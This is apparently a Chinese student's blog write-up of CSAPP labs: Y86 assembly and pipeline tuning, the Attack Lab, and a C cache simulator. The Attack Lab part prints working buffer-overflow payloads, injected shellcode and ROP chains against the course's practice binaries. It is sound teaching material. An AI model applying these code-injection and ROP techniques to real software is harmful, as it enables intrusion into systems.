CSAPP-Labs_part2

ArchitectureLab

准备

这个实验无疑是目前已做三个实验里花费我最多精力的，很可能也是所有实验里最花费精力的一个。如某人所言，本实验实验环境的搭建甚至比实验内容本身还要困难。搭建环境的过程不知掉了多少头发，可谓是十分痛苦了，令我一度想要放弃本实验。现在磕磕绊绊把实验做完，回顾全过程，记录下实验中遇到的一些难点，即是反思回味，也希望能帮助同我当初一样面对这般那般的问题而一筹莫展的朋友

我的实验环境为WSL版的Ubuntu，由于没有安装相关库，模拟器不支持GUI界面，因此在解压sim包后，将sim目录下的Makefile文件中涉及GUI的三行注释掉

#GUIMODE=-DHAS_GUI
#TKLIBS=-L/usr/lib -ltk -ltcl
#TKINC=-isystem /usr/include

注释GUI相关东西是我从别人博客学到的，在整个实验过程中我也没有使用过GUI。我自己也尝试过安装tk与tcl，但是如果安装版本是8.6及以上，仍不能正常使用，若想要在本实验中使用GUI，tk与tcl必须安装为8.5版本及以下，接着尝试

unix> make clean
unix> make

如果报错信息包含关键词flex和bison，可能是没有安装相关依赖软件，尝试安装

unix> sudo apt-get install flex
unix> sudo apt-get install bison

unix> make

时显示某.c文件报以下错误

build fails with tcl 8.6: error: tcl_interp has no member named result

请参考这篇文章查看解决方案

Part A

这一部分内容较为简单，正如lab介绍文档中所言，part A部分是为后续实验准备的热身运动

sum.ys

# Execution begins at address 0
    .pos 0
    irmovq stack, %rsp
    call main
    halt

# Sample linked list
    .align 8
list:
    ele1:
        .quad 0x00a
        .quad ele2
    ele2:
        .quad 0x0b0
        .quad ele3
    ele3:
        .quad 0xc00
        .quad 0

main:
    irmovq list, %rdi
    call sum_list
    ret

# long sum_list(list_ptr ls)
# ls in %rdi
sum_list:
    irmovq $8, %r8
    xorq %rax, %rax
test:
    andq %rdi, %rdi
    je done
    mrmovq (%rdi), %r9
    addq %r9, %rax
    addq %r8, %rdi
    mrmovq (%rdi), %rdi
    jmp test
done:
    ret

    .pos 0x200
stack:

ArchitectureLab/sim/misc> make sum.yo
./yas sum.ys
ArchitectureLab/sim/misc> ./yis sum.yo
Stopped in 32 steps at PC = 0x13.  Status 'HLT', CC Z=1 S=0 O=0
Changes to registers:
%rax:   0x0000000000000000  0x0000000000000cba
%rsp:   0x0000000000000000  0x0000000000000200
%r8:    0x0000000000000000  0x0000000000000008
%r9:    0x0000000000000000  0x0000000000000c00

Changes to memory:
0x01f0: 0x0000000000000000  0x000000000000005b
0x01f8: 0x0000000000000000  0x0000000000000013

rsum.ys

# Execution begins at address 0
    .pos 0
    irmovq stack, %rsp
    call main
    halt

# Sample linked list
    .align 8
list:
    ele1:
        .quad 0x00a
        .quad ele2
    ele2:
        .quad 0x0b0
        .quad ele3
    ele3:
        .quad 0xc00
        .quad 0

main:
    irmovq list, %rdi
    call rsum_list
    ret

# long rsum_list(list_ptr ls)
# ls in %rdi
rsum_list:
    irmovq $8, %r8
    xorq %rax, %rax
    andq %rdi, %rdi
    je null_pointer
    mrmovq (%rdi), %rbx
    pushq %rbx
    addq %r8, %rdi
    mrmovq (%rdi), %rdi
    call rsum_list
    popq %rbx
    addq %rbx, %rax
null_pointer:
    ret

    .pos 0x200
stack:

ArchitectureLab/sim/misc> make rsum.yo
./yas rsum.ys
ArchitectureLab/sim/misc> ./yis rsum.yo
Stopped in 47 steps at PC = 0x13.  Status 'HLT', CC Z=0 S=0 O=0
Changes to registers:
%rax:   0x0000000000000000  0x0000000000000cba
%rbx:   0x0000000000000000  0x000000000000000a
%rsp:   0x0000000000000000  0x0000000000000200
%r8:    0x0000000000000000  0x0000000000000008

Changes to memory:
0x01c0: 0x0000000000000000  0x0000000000000094
0x01c8: 0x0000000000000000  0x0000000000000c00
0x01d0: 0x0000000000000000  0x0000000000000094
0x01d8: 0x0000000000000000  0x00000000000000b0
0x01e0: 0x0000000000000000  0x0000000000000094
0x01e8: 0x0000000000000000  0x000000000000000a
0x01f0: 0x0000000000000000  0x000000000000005b
0x01f8: 0x0000000000000000  0x0000000000000013

copy.ys

# Execution begins at address 0
    .pos 0
    irmovq stack, %rsp
    call main
    halt

    .align 8
# Source block
src:
    .quad 0x00a
    .quad 0x0b0
    .quad 0xc00

# Destination block
dest:
    .quad 0x111
    .quad 0x222
    .quad 0x333

main:
    irmovq src, %rdi
    irmovq dest, %rsi
    irmovq $3, %rdx
    call copy_block
    ret

# long copy_block(long* src, long* dest, long len)
# src in %rdi, dest in %rsi, len in %rdx
copy_block:
    irmovq $1, %r10
    irmovq $8, %r8
    xorq %rax, %rax
loop:
    andq %rdx, %rdx
    je done
    mrmovq (%rdi), %r9
    addq %r8, %rdi
    rmmovq %r9, (%rsi)
    addq %r8, %rsi
    xorq %r9, %rax
    subq %r10, %rdx
    jmp loop
done:
    ret

    .pos 0x200
stack:

ArchitectureLab/sim/misc> make copy.yo
./yas copy.ys
ArchitectureLab/sim/misc> ./yis copy.yo
Stopped in 41 steps at PC = 0x13.  Status 'HLT', CC Z=1 S=0 O=0
Changes to registers:
%rax:   0x0000000000000000  0x0000000000000cba
%rsp:   0x0000000000000000  0x0000000000000200
%rsi:   0x0000000000000000  0x0000000000000048
%rdi:   0x0000000000000000  0x0000000000000030
%r8:    0x0000000000000000  0x0000000000000008
%r9:    0x0000000000000000  0x0000000000000c00
%r10:   0x0000000000000000  0x0000000000000001

Changes to memory:
0x0030: 0x0000000000000111  0x000000000000000a
0x0038: 0x0000000000000222  0x00000000000000b0
0x0040: 0x0000000000000333  0x0000000000000c00
0x01f0: 0x0000000000000000  0x000000000000006f
0x01f8: 0x0000000000000000  0x0000000000000013

Part B

实验的第二部分也不困难，只需实现一个iaddq立即数加功能即可，所需修改部分如下

bool instr_valid = icode in 
    { INOP, IHALT, IRRMOVQ, IIRMOVQ, IRMMOVQ, IMRMOVQ,
           IOPQ, IJXX, ICALL, IRET, IPUSHQ, IPOPQ, IIADDQ };

# Does fetched instruction require a regid byte?
bool need_regids =
    icode in { IRRMOVQ, IOPQ, IPUSHQ, IPOPQ, 
             IIRMOVQ, IRMMOVQ, IMRMOVQ, IIADDQ };

# Does fetched instruction require a constant word?
bool need_valC =
    icode in { IIRMOVQ, IRMMOVQ, IMRMOVQ, IJXX, ICALL, IIADDQ };

## What register should be used as the B source?
word srcB = [
    icode in { IOPQ, IRMMOVQ, IMRMOVQ, IIADDQ  } : rB;
    icode in { IPUSHQ, IPOPQ, ICALL, IRET } : RRSP;
    1 : RNONE;  # Don't need register
];

## What register should be used as the E destination?
word dstE = [
    icode in { IRRMOVQ } && Cnd : rB;
    icode in { IIRMOVQ, IOPQ, IIADDQ} : rB;
    icode in { IPUSHQ, IPOPQ, ICALL, IRET } : RRSP;
    1 : RNONE;  # Don't write any register
];

## Select input A to ALU
word aluA = [
    icode in { IRRMOVQ, IOPQ } : valA;
    icode in { IIRMOVQ, IRMMOVQ, IMRMOVQ, IIADDQ } : valC;
    icode in { ICALL, IPUSHQ } : -8;
    icode in { IRET, IPOPQ } : 8;
    # Other instructions don't need ALU
];

## Select input B to ALU
word aluB = [
    icode in { IRMMOVQ, IMRMOVQ, IOPQ, ICALL, 
              IPUSHQ, IRET, IPOPQ, IIADDQ } : valB;
    icode in { IRRMOVQ, IIRMOVQ } : 0;
    # Other instructions don't need ALU
];

后续按照实验手册测试步骤照做即可

Part C

最后部分稍难一些，需要对流水线有较好理解后自行优化硬件逻辑及汇编代码，尽可能高效地实现函数功能。先说下我对pipe-full.hcl文件的修改。首先是听从了实验手册的建议，实现了iaddq立即数加法指令，代码修改同Part B部分。因为函数含循环涉及大量条件跳转，考虑过将跳转预测逻辑修改为后向分支跳转，前向分支不跳转（见习题4.56），但稍加分析认为在本题中修改分支预测逻辑并无提升，遂延用默认预测逻辑

对于ncopy.ys代码的优化，首先是利用实现的iaddq将原本的诸如

    irmovq $1, %r10
    addq %r10, %rax

两条指令合为一条

    iaddq $1, %r10

其次注意到

    mrmovq (%rdi), %r10
    rmmovq %r10, (%rsi)
    andq %r10, %r10

产生加载/使用冲突，浪费一个时钟周期，通过重排指令顺序将该周期利用起来

    mrmovq (%rdi), %r10
    andq %r10, %r10
    rmmovq %r10, (%rsi)

再根据实验手册建议，参考第五章循环展开部分对CPE进行优化

    mrmovq (%rdi), %r10 # read val from src...
    mrmovq 8(%rdi), %r11
    mrmovq 16(%rdi), %r12
    mrmovq 24(%rdi), %r13
    andq %r10, %r10     # val <= 0?
    rmmovq %r10, (%rsi) # ...and store it to dst
    jle Npos1       # if so, goto Npos:
    iaddq $1, %rax      # count++
Npos1:
    andq %r11, %r11
    rmmovq %r11, 8(%rsi)
    jle Npos2
    iaddq $1, %rax
Npos2:
    andq %r12, %r12
    rmmovq %r12, 16(%rsi)
    jle Npos3
    iaddq $1, %rax
Npos3:
    andq %r13, %r13
    rmmovq %r13, 24(%rsi)
    jle Npos4
    iaddq $1, %rax
Npos4:
    iaddq $32, %rdi     # src+=4
    iaddq $32, %rsi     # dst+=4

完整代码见下

#/* $begin ncopy-ys */
##################################################################
# ncopy.ys - Copy a src block of len words to dst.
# Return the number of positive words (>0) contained in src.
#
# Include your name and ID here.
#
# Describe how and why you modified the baseline code.
#
##################################################################
# Do not modify this portion
# Function prologue.
# %rdi = src, %rsi = dst, %rdx = len
ncopy:

##################################################################
# You can modify this portion
    # Loop header
    xorq %rax, %rax     # count = 0;
    iaddq $-8, %rdx     # len -= 8
    andq %rdx, %rdx     # len < 0?
    jl Remain       # if so, goto Remain:
    
Loop:   
    mrmovq (%rdi), %r10 # read val from src...
    mrmovq 8(%rdi), %r11
    mrmovq 16(%rdi), %r12
    mrmovq 24(%rdi), %r13
    andq %r10, %r10     # val <= 0?
    rmmovq %r10, (%rsi) # ...and store it to dst
    jle Npos1       # if so, goto Npos:
    iaddq $1, %rax      # count++
Npos1:
    andq %r11, %r11
    rmmovq %r11, 8(%rsi)
    jle Npos2
    iaddq $1, %rax
Npos2:
    andq %r12, %r12
    rmmovq %r12, 16(%rsi)
    jle Npos3
    iaddq $1, %rax
Npos3:
    andq %r13, %r13
    rmmovq %r13, 24(%rsi)
    jle Npos4
    iaddq $1, %rax
Npos4:
    iaddq $32, %rdi     # src+=4
    iaddq $32, %rsi     # dst+=4
    
    mrmovq (%rdi), %r10 # read val from src...
    mrmovq 8(%rdi), %r11
    mrmovq 16(%rdi), %r12
    mrmovq 24(%rdi), %r13
    andq %r10, %r10     # val <= 0?
    rmmovq %r10, (%rsi) # ...and store it to dst
    jle Npos5       # if so, goto Npos:
    iaddq $1, %rax      # count++
Npos5:
    andq %r11, %r11
    rmmovq %r11, 8(%rsi)
    jle Npos6
    iaddq $1, %rax
Npos6:
    andq %r12, %r12
    rmmovq %r12, 16(%rsi)
    jle Npos7
    iaddq $1, %rax
Npos7:
    andq %r13, %r13
    rmmovq %r13, 24(%rsi)
    jle Npos8
    iaddq $1, %rax
Npos8:
    iaddq $32, %rdi     # src+=4
    iaddq $32, %rsi     # dst+=4
    
    iaddq $-8, %rdx     # len -= 8
    jge Loop            # if so, goto Loop:
Remain:
    iaddq $8, %rdx
    je Done
Final_loop:
    mrmovq (%rdi), %r10 # read val from src...
    andq %r10, %r10     # val <= 0?
    rmmovq %r10, (%rsi) # ...and store it to dst
    jle Npos9       # if so, goto Npos9:
    iaddq $1, %rax      # count++
Npos9:  
    iaddq $8, %rdi      # src++
    iaddq $8, %rsi      # dst++
    iaddq $-1, %rdx     # len--
    jg Final_loop

##################################################################
# Do not modify the following section of code
# Function epilogue.
Done:
    ret
##################################################################
# Keep the following label at the end of your function
End:
#/* $end ncopy-ys */

最终测试

unix> make psim VERSION=full
unix> ./psim -t sdriver.yo
unix> ./psim -t ldriver.yo
unix> ./correctness.pl
unix> ./benchmark.pl

最终结果Average CPE为8.70，分数为35.9。满分需要Average CPE在7.50及以下，暂时先到这里，以后有机会再考虑继续优化，完成这个实验花费了大量时间与精力

小结

第四章的学习对我来说是一个巨大的挑战。当初计组考前突击刷了几年的原题，背了一些高频考点，侥幸拿了个93分，实际的水平只有自己知道。甚至一直没有弄明白流水线条件跳转指令如果分支预测错了究竟是怎样消除错误取指的影响，回到正确的位置继续运行，对旁路预取也只有一个概念性的了解。学完第四章，豁然开朗，心中埋藏已久的疑惑终才解开。其实还是能感觉到没有把流水线吃得很透，做家庭作业时明显感到有些吃力，不过哪怕过程磕磕绊绊，终究还是收获满满，对底层硬件的原理有了更深刻的理解

由衷地向硬件设计者们表达我的敬意

AttackLab

Level 1

Phase 1是一个简单直白的攻击，作为后续攻击的热身，只需照着说明手册上的提示一步步跟着做，即可将其破解

首先反汇编touch1()函数，获其地址为0x4017c0

(gdb) disassemble touch1
Dump of assembler code for function touch1:
   0x00000000004017c0 <+0>:     sub    $0x8,%rsp
   ......

接着反汇编test()函数

(gdb) disassemble test
Dump of assembler code for function test:
   0x0000000000401968 <+0>:     sub    $0x8,%rsp
   0x000000000040196c <+4>:     mov    $0x0,%eax
   0x0000000000401971 <+9>:     callq  0x4017a8 <getbuf>
   0x0000000000401976 <+14>:    mov    %eax,%edx
   0x0000000000401978 <+16>:    mov    $0x403188,%esi
   0x000000000040197d <+21>:    mov    $0x1,%edi
   0x0000000000401982 <+26>:    mov    $0x0,%eax
   0x0000000000401987 <+31>:    callq  0x400df0 <__printf_chk@plt>
   0x000000000040198c <+36>:    add    $0x8,%rsp
   0x0000000000401990 <+40>:    retq   
End of assembler dump.

继续反汇编getbuf()函数

(gdb) disassemble getbuf
Dump of assembler code for function getbuf:
   0x00000000004017a8 <+0>:     sub    $0x28,%rsp
   0x00000000004017ac <+4>:     mov    %rsp,%rdi
   0x00000000004017af <+7>:     callq  0x401a40 <Gets>
   0x00000000004017b4 <+12>:    mov    $0x1,%eax
   0x00000000004017b9 <+17>:    add    $0x28,%rsp
   0x00000000004017bd <+21>:    retq   
End of assembler dump.

由题意，需要通过栈溢出攻击，使得getbuf()函数调用retq语句返回目标地址从原本的test()函数体内转移至我们希望的touch1()函数。而getbuf()函数在栈上申请了40字节的缓冲区，反汇编Gets()函数后分析知它只是忠实地将用户输入字符串放置于缓冲区中，因此，只需先随意输入40个字符将缓冲区占满，再输入touch1()函数地址，修改getbuf()函数返回地址即可，因此，选择输入的文本如下

fez@papyruszzz:/mnt/d/repositories/CSAPP/Labs/AttackLab/target1$ cat ctarget1.txt 
01 02 03 04 05 06 07 08 09 10
01 02 03 04 05 06 07 08 09 10
01 02 03 04 05 06 07 08 09 10
01 02 03 04 05 06 07 08 09 10
c0 17 40 00 00 00 00 00

需注意的是内存地址为64位八字节长，因此touch1()函数首地址0x4017c0应补齐为0x004017c0，再按小端顺序排列
测试结果

fez@papyruszzz:/mnt/d/repositories/CSAPP/Labs/AttackLab/target1$ ./hex2raw < ctarget1.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch1!: You called touch1()
Valid solution for level 1 with target ctarget
PASS: Would have posted the following:
    user id bovik
    course  15213-f15
    lab attacklab
    result  1:PASS:0xffffffff:ctarget:1:01 02 03 04 05 06 07 08 09 10 01 02 03 04 05 06 07 08 09 10 01 02 03 04 05 06 07 08 09 10 01 02 03 04 05 06 07 08 09 10 C0 17 40 00

Level 2

Phase 2在前一题的基础上稍微提升了一点难度。我的cookie值为0x59b997fa，反汇编获得touch2()函数首地址为0x4017ec，我们的注入代码应实现的功能为

1. 将cookie值写入%rdi寄存器
2. 调用touch2()函数

得代码

movq $0x59b997fa, %rdi
pushq $0x4017ec
retq

按说明文档步骤，通过gcc -c tempfile.s和objdump tempfile.o > tempfile.d得对应机器码

48 c7 fa 97 b9 59
68 ec 17 40 00
c3

通过gdb调试ctarget在getbuf()函数中打断点得输入字符串的首地址为0x5561dc78，故最终输入文本为

48 c7 c7 fa 97 b9 59
68 ec 17 40 00
c3
31 32 33 34 35 36 37
31 32 33 34 35 36 37 38 39 30
31 32 33 34 35 36 37 38 39 30
78 dc 61 55 00 00 00 00

测试结果

fez@papyruszzz:/mnt/d/repositories/CSAPP/Labs/AttackLab/target1$ ./hex2raw < ctarget2.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target ctarget
PASS: Would have posted the following:
    user id bovik
    course  15213-f15
    lab attacklab
    result  1:PASS:0xffffffff:ctarget:2:48 C7 C7 FA 97 B9 59 68 EC 17 40 00 C3 31 32 33 34 35 36 37 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 37 38 39 30 78 DC 61 55

Level 3

Phase 3需将值为cookie的字符串作为参数传递给touch3()函数，因hexmatch()函数内的指针s指向cbuf数组中的不确定位置，若按Phase 2中做法将注入代码与数据放于getbuf()函数申请的40个字节大小的缓存区内，则存在代码与数据被覆盖的可能。因此选择将注入代码与数据放于将要修改的getbuf()函数返回地址栈帧之上，即使用调用getbuf()函数的test()函数的栈帧来存储注入代码与数据，便可规避数据覆盖的风险

首先反汇编获得touch3()函数首地址为0x4018fa，我实验环境的cookie值为0x59b997fa，对应字符串为35 39 62 39 39 37 66 61，getbuf()函数返回地址存放在0x5561dca0处，则我们的代码应从0x5561dca8处开始，代码需要实现

1. 将字符串首地址传递给%rdi
2. 调用touch3()函数

得代码

movq 字符串首地址, %rdi       ;48 c7 c7 xx xx xx xx
pushq $0x4018fa             ;68 fa 18 40 00
retq                        ;c3

xx xx xx xx为待计算出的字符串首地址

选择将字符串数据放于注入代码之后，得输入文本

0x5561dc78:     31 32 33 34 35 36 37 38     ;填充
0x5561dc80:     39 30 31 32 33 34 35 36     ;填充
0x5561dc88:     37 38 39 30 31 32 33 34     ;填充
0x5561dc90:     35 36 37 38 39 30 31 32     ;填充
0x5561dc98:     33 34 35 36 37 38 39 30     ;填充
0x5561dca0:     a8 dc 61 55 00 00 00 00     ;返回地址
0x5561dca8:     48 c7 c7 xx xx xx xx 68     ;代码
0x5561dcb0:     fa 18 40 00 c3 00 00 00     ;代码
0x5561dcb8:     35 39 62 39 39 37 66 61     ;字符串

观察知字符串首地址为0x5561dcb8，故最终文本为

31 32 33 34 35 36 37 38 39 30
31 32 33 34 35 36 37 38 39 30
31 32 33 34 35 36 37 38 39 30
31 32 33 34 35 36 37 38 39 30
a8 dc 61 55 00 00 00 00
48 c7 c7 b8 dc 61 55 68
fa 18 40 00 c3 00 00 00
35 39 62 39 39 37 66 61

测试结果

fez@papyruszzz:/mnt/d/repositories/CSAPP/Labs/AttackLab/target1$ ./hex2raw < ctarget3.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target ctarget
PASS: Would have posted the following:
    user id bovik
    course  15213-f15
    lab attacklab
    result  1:PASS:0xffffffff:ctarget:3:31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 37 38 39 30 A8 DC 61 55 00 00 00 00 48 C7 C7 B8 DC 61 55 68 FA 18 40 00 C3 00 00 00 35 39 62 39 39 37 66 61

Level 2

思路：要想办法将cookie值传给%rdi寄存器，首先将该该值放于堆栈中一处，三种可选指令里只有popq指令能做到将堆栈中的值赋予寄存器，若能直接popq %rdi则皆大欢喜，若不能则需先将cookie值存于某一寄存器中，再通过movq指令将该值传入%rdi寄存器，最后调用touch2()函数实现最终目的

按照教学文档提示，在start_farm()和mid_farm()间寻找movq X, %rdi型字节码（48 89 xx），且该条指令之后立即跟上nop字节码（90）或retq字节码（c3），唯一的一条满足以上条件的指令在setval_426()函数中，首地址为0x4019c5，该指令实现movq %rax, %rdi，于是知应先将cookie值存于%rax寄存器中，即使用popq %rax指令，于是接着在addval_219()函数中地址为0x4019ab处寻得该指令

综上易得正确文本

31 32 33 34 35 36 37 38 39 30
31 32 33 34 35 36 37 38 39 30
31 32 33 34 35 36 37 38 39 30
31 32 33 34 35 36 37 38 39 30
ab 19 40 00 00 00 00 00
fa 97 b9 59 00 00 00 00
c5 19 40 00 00 00 00 00
ec 17 40 00 00 00 00 00

测试结果

fez@papyruszzz:/mnt/d/repositories/CSAPP/Labs/AttackLab/target1$ ./hex2raw < rtarget1.txt | ./rtarget -q
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target rtarget
PASS: Would have posted the following:
    user id bovik
    course  15213-f15
    lab attacklab
    result  1:PASS:0xffffffff:rtarget:2:31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 37 38 39 30 AB 19 40 00 00 00 00 00 FA 97 B9 59 00 00 00 00 C5 19 40 00 00 00 00 00 EC 17 40 00 00 00 00 00

Level 3

Phase 5感觉比前四个难不少。首先我将从start_farm()到end_farm()内所有的函数的字节码全记在一张纸上，根据说明文档的Figure筛选出有用gadget如下（已剔除重复指令）

addval_273(): movq %rax, %rdi
addval_273(): movl %eax, %edi
getval_481(): movl %eax, %edx
addval_190(): movq %rsp, %rax
addval_190(): movl %esp, %eax
getval_159(): movl %edx, %ecx

最开始尝试在所有函数中寻找是否有指令序列正好与待传送的cookie字符串值相等，但没找到。因为可用的只有mov和pop两类指令，条件限制严格，遂尝试寻找一个指令序列，先执行mov，接着执行pop，再调用ret

movq X, Y
pop Z

两条连着的指令，即机器码形如

89 xx 5x

若存在满足上述条件的指令序列，则可尝试通过前一句的mov指令将字符串首地址传在某寄存器中，同时pop指令跳过我们混合在代码中的字符串，但并不存在满足上述条件的指令。一度陷入迷茫。参考他人题解后方知有一重要信息没利用到

在这一堆getval_xxx()，setval_xxx()和addval_xxx()里，有一个特殊的函数：add_xy()，这个函数将%rdi寄存器和%rsi寄存器里的值相加，结果保存在%rax寄存器中，而我们又有一个唯一可用的的pop型指令popq %rax，结合能用的几种指令，想出如下办法（见图片右上角）

得输入序列

31 32 33 34 35 36 37 38 39 30
31 32 33 34 35 36 37 38 39 30
31 32 33 34 35 36 37 38 39 30
31 32 33 34 35 36 37 38 39 30
ab 19 40 00 00 00 00 00
20 00 00 00 00 00 00 00
dd 19 40 00 00 00 00 00
34 1a 40 00 00 00 00 00
13 1a 40 00 00 00 00 00
06 1a 40 00 00 00 00 00
a2 19 40 00 00 00 00 00
d6 19 40 00 00 00 00 00
a2 19 40 00 00 00 00 00
fa 18 40 00 00 00 00 00
35 39 62 39 39 37 66 61

测试答案

fez@papyruszzz:/mnt/d/repositories/CSAPP/Labs/AttackLab/target1$ ./hex2raw < rtarget2.txt | ./rtarget -q
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target rtarget
PASS: Would have posted the following:
    user id bovik
    course  15213-f15
    lab attacklab
    result  1:PASS:0xffffffff:rtarget:3:31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 37 38 39 30 AB 19 40 00 00 00 00 00 20 00 00 00 00 00 00 00 DD 19 40 00 00 00 00 00 34 1A 40 00 00 00 00 00 13 1A 40 00 00 00 00 00 06 1A 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 D6 19 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 FA 18 40 00 00 00 00 00 35 39 62 39 39 37 66 61

小结

总的来说,attacklab的五个phase难度都不很大。能有机会做一次“黑客”还是挺酷的，通过使用CI和ROP方法对程序进行缓冲区溢出攻击，更能深刻体会限制缓存区长度、对程序各种可能的输入的周全考虑必要性。

CacheLab

Part A

说实话这部分给我带来的挑战感觉并不很大，感觉自己逻辑是对的但检查来检查去就是得不到预期答案，哪怕参考他人代码核对后仍然觉得自己的没问题，实在是过于折磨......

因为我是把整本书全看完才开始做这个实验的，而这一部分涉及文件读取，我一上来就想到了使用第十章中学到的dup2()函数将标准输入重定向到文件，再尝试scanf()读入，但不知为何就是不停报错Segmentation fault，检查多次修改多处仍不能正常运行，遂参考他人思路，利用fgets()逐行读入数据再逐字符分析，最终版本如下

#include "cachelab.h"
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <getopt.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <limits.h>

#define MAXBUF 128                  /* 缓冲区大小 */
#define IDX(m, n, E) m * E + n      /* 计算m行n列元素位置 */

void help(char *argv[]);
void load_store(int count, unsigned tag, unsigned index, unsigned offset, unsigned size, int E);
int hextodec(char c);               /* 十六进制转十进制 */
void print(char buf[]);

int hit_count = 0, miss_count = 0, eviction_count = 0;
int v = 0;                          /* v代表是否开启详细显示模式 */
char buffer[MAXBUF];                /* 读取缓冲区 */
FILE *fp;                           
typedef struct {
    int valid;                      /* 有效位 */
    int tag;
    int count;                      /* count值越大，说明最近被使用 */
}unit;                              /* 一个unit单元即为cache中一行 */
unit* cache;

int main(int argc, char *argv[])
{
    char opt;
    unsigned int s = 0, E = 0, b = 0, s_pow = 0;
    while ((opt = getopt(argc, argv, "hvs:E:b:t:")) != -1) {
        switch(opt) {
            case 'h':
                help(argv);
                return 0;
            case 'v':
                v = 1;
                break;
            case 's':
                s = atoi(optarg);
                s_pow = 1 << s;
                break;
            case 'E':
                E = atoi(optarg);
                break;
            case 'b':
                b = atoi(optarg);
                break;
            case 't':
                if ((fp = fopen(optarg, "r")) == NULL) {
                    printf("ERROR!%s open failed!\n", optarg);
                    exit(1);
                }
                break;
            case '?':
                help(argv);
                return 0;
        }
    }
    if (s == 0 || E == 0 || b == 0) {
        printf("%s: Missing required command line argument\n", argv[0]);
        help(argv);
        return 0;
    }
    cache = (unit*)malloc(16 * s_pow * E);      /* 16是因为考虑了对齐 */
    for (int i = 0; i < s_pow * E; i++) {
        cache[i].valid = cache[i].tag = cache[i].count = 0;
    }
    
    int count = 0;
    while (fgets(buffer, MAXBUF, fp)) {         /* 逐行分析 */
        char c;
        int op = 0, comma = 0;
        unsigned int offset = 0, tag = 0, index = 0;
        unsigned int size = 0, address = 0;
        count++;

        for (int i = 0; (c = buffer[i]) && (c != '\n'); i++) {
            if (c == ' ') continue;
            else if (c == 'I') op = 0;
            else if (c == 'L' || c == 'S') op = 1;
            else if (c == 'M') op = 2;
            else if (c == ',') comma = 1;
            else {
                if (comma)  size = hextodec(c); /* 当读取到逗号时，之后的数据是size大小 */
                else        address = 16 * address + hextodec(c);
            }
        }

        for (int i = 0; i < b; i++) {           /* 实际上offset在本实验中没用，可以抛弃 */
            offset = offset * 2 + address % 2;
            address >>= 1;
        }

        for (int i = 0; i < s; i++) {
            index = index * 2 + address % 2;
            address >>= 1;
        }

        tag = address;

        if (v && op)
            print(buffer);
        if (op == 1) {
            load_store(count, tag, index, offset, size, E);
            if (v) printf("\n");
        }
            
        if (op == 2) {
            load_store(count, tag, index, offset, size, E);
            hit_count++;
            if (v)  printf(" hit\n");
        }
    }   

    free(cache);
    fclose(fp);
    printSummary(hit_count, miss_count, eviction_count);
    return 0;
}

void help(char *argv[]) {
    printf("Usage: %s [-hv] -s <num> -E <num> -b <num> -t <file>\n", argv[0]);
    printf("Options:\n");
    printf("  -h\t\tPrint this help message.\n");
    printf("  -v\t\tOptional verbose flag.\n");
    printf("  -s <num>\tNumber of set index bits.\n");
    printf("  -E <num>\tNumber of lines per set.\n");
    printf("  -b <num>\tNumber of block offset bits.\n");
    printf("  -t <file>\tTrace file.\n\n");
    printf("Examples:\n");
    printf("  linux>  %s -s 4 -E 1 -b 4 -t traces/yi.trace\n", argv[0]);
    printf("  linux>  %s -v -s 8 -E 2 -b 4 -t traces/yi.trace\n", argv[0]);
}

void load_store(int count, unsigned tag, unsigned index, unsigned offset, unsigned size, int E) {
    //is it already in the cache?
    for (int i = 0; i < E; i++) {
        if (cache[IDX(index, i, E)].tag == tag && cache[IDX(index, i, E)].valid) {
            cache[IDX(index, i, E)].count = count;
            hit_count++;
            if (v) printf(" hit");
            return;
        }
    }
    
    miss_count++;
    if (v) printf(" miss");
    //is set already full?
    for (int i = 0; i < E; i++) {
        if (!cache[IDX(index, i, E)].valid) {
            cache[IDX(index, i, E)].valid = 1;
            cache[IDX(index, i, E)].tag = tag;
            cache[IDX(index, i, E)].count = count;
            return;
        }
    }
    
    //full
    int min_index = 0, min_count = INT_MAX;
    for (int i = 0; i < E; i++) {
        if (cache[IDX(index, i, E)].count < min_count) {
            min_count = cache[IDX(index, i, E)].count;
            min_index = i;
        }
    }
    cache[IDX(index, min_index, E)].tag = tag;
    cache[IDX(index, min_index, E)].count = count;
    eviction_count++;
    if (v) printf(" eviction");
}   

int hextodec(char c) {
    if (c >= '0' && c <= '9') {
        return c - '0';
    }
    if (c >= 'A' && c <= 'F') {
        return c - 'A' + 10;
    }
    if (c >= 'a' && c <= 'f') {
        return c - 'a' + 10;
    }
    return 0;
}

void print(char buf[]) {
    for (int i = 0; buf[i] != '\n'; i++)
        printf("%c", buf[i]);
}

使用

unix> make clean
unix> make
unix> ./test-csim

进行测试，注意不要自行定义printSummary()函数，该函数在cachelab.h中声明，在cachelab.c中定义，无需自行声明定义

Part B

